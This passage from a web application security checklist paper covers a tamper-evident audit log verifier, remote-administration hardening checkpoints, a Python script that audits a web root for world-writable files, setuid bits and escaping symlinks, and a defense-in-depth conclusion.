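        return digest


def verify(lines):
    """Return (True, -1) if the chain is intact, else (False, first_bad_index)."""
    prev = GENESIS
    for i, line in enumerate(lines):
        payload, _, digest = line.rpartition(" ")
        if hashlib.sha256(payload.encode("utf-8")).hexdigest() != digest:
            return False, i  # record content was altered
        if json.loads(payload).get("prev") != prev:
            return False, i  # a record before this one was removed or replaced
        prev = digest
    return True, -1


def sample_log():
    """Constructed sequence covering the checklist's event classes."""
    log = AuditLog()
    log.record("auth.login", "success", "jdoe", "/login", "10.0.0.5")
    log.record("auth.login", "failure", "admin", "/login", "198.51.100.7")
    log.record("data.delete", "success", "admin", "orders/1042", "10.0.0.9")
    log.record("data.modify", "success", "admin", "users.email", "10.0.0.9",
               field_type="varchar(255)", permissions="rw-r-----")
    return log
```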

Remote Administration

Challenge:

In a most secure scenario, remote administration is not allowed. As this is not often possible, it is necessary to design a secure system for remote connections to the server.

Checkpoints:

Determine how the site is to be administered. Document who has the rights to make changes, and when they can be made. Determine an effective vehicle for remote management such as a VPN solution, strong authentication with tokens, or certificates.


Configure server disks to allow for the separation of the operating system and the web server. This will allow the restriction of directory traversal to inappropriate locations.

Disable any services that are not used by the web server or applications.

Delete default accounts and their default passwords.

Verify that assigned file and directory permissions are correctly applied using "least privilege" mode.

Rename the default Administrator account or make it inaccessible. Delete all guest accounts.

Disable debugging functions.

Edit error messages to provide as little information as possible to a hacker.


Do not use self-signed SSL certificates, or default certificates. Assure that SSL certificates and encryption settings are properly configured.

Scan from the outside network to assure that all unnecessary ports are closed. Run port scans monthly to assure that nothing has been changed.

Assign security maintenance to an individual or team to be responsible for: monitoring the latest security vulnerabilities; testing and applying the latest patches; updating security configuration guidelines; regular vulnerability scanning; regular status reports to upper management; and documenting the overall security practice or posture.
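A check for the "least privilege" and directory-separation checkpoints above, as an added example that is not code from the paper: it walks a web root and reports world-writable entries, setuid/setgid regular files, and symbolic links that resolve outside the root. Which conditions count as findings is this example's choice, and the sample tree it builds is constructed for the demonstration.

```python
import os
import stat
import tempfile

# Added example, not code from the paper: a least-privilege audit of a web
# root. It reports world-writable entries, regular files with the setuid or
# setgid bit, and symbolic links that resolve outside the root. The checks
# are this example's choices for the paper's "least privilege" checkpoint.


def audit_tree(root):
    """Return a sorted list of (relative_path, finding) for everything under root."""
    root = os.path.realpath(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):  # followlinks=False
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            mode = os.lstat(full).st_mode  # lstat: inspect the link itself
            if stat.S_ISLNK(mode):
                target = os.path.realpath(full)
                if os.path.commonpath([root, target]) != root:
                    findings.append((rel, "symlink escapes web root: " + target))
                continue
            if mode & stat.S_IWOTH:
                findings.append((rel, "world-writable"))
            if stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append((rel, "setuid/setgid bit set"))
    return sorted(findings)


def build_sample_root():
    """Construct a throwaway tree with one clean file and three violations."""
    base = tempfile.mkdtemp(prefix="webroot-audit-")
    htdocs = os.path.join(base, "htdocs")
    private = os.path.join(base, "private")  # outside the web root
    os.makedirs(os.path.join(htdocs, "uploads"))
    os.makedirs(private)
    open(os.path.join(htdocs, "index.html"), "w").close()
    open(os.path.join(private, "db.conf"), "w").close()
    upload = os.path.join(htdocs, "uploads", "upload.php")
    open(upload, "w").close()
    os.chmod(upload, 0o666)  # world-writable script
    os.chmod(os.path.join(htdocs, "uploads"), 0o777)  # world-writable directory
    os.symlink(private, os.path.join(htdocs, "cfg"))  # link out of the web root
    return htdocs


if __name__ == "__main__":
    for path, finding in audit_tree(build_sample_root()):
        print("%-24s %s" % (path, finding))
```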

Conclusion


Each of the challenges discussed in this paper is a part of a full "Defense in Depth." Should any one piece of this defense fail or be compromised, another layer of defense should stop an intruder from taking complete control of the site.

The checklist provides a foundation for selecting and contracting with an application developer. The corporation's requirements for security are clearly available to the developer as part of the contract. The developer will have a concrete understanding of the risk mitigation requirements throughout the design and development process. Prior to moving into a production environment, security analysis can verify that all known security gaps are closed.

Security requirements will change in response to the external environment. What secured an application today may need to be changed tomorrow. Constant review and attention to the current security threat environment is necessary to maintain the application's security.

Externally facing applications have provided corporations great flexibility and greater efficiencies. As evidenced by the challenges of this checklist, they can also provide a serious security risk if they attach to mission critical systems. It is imperative to secure and maintain the state of security throughout the life-cycle of the application.


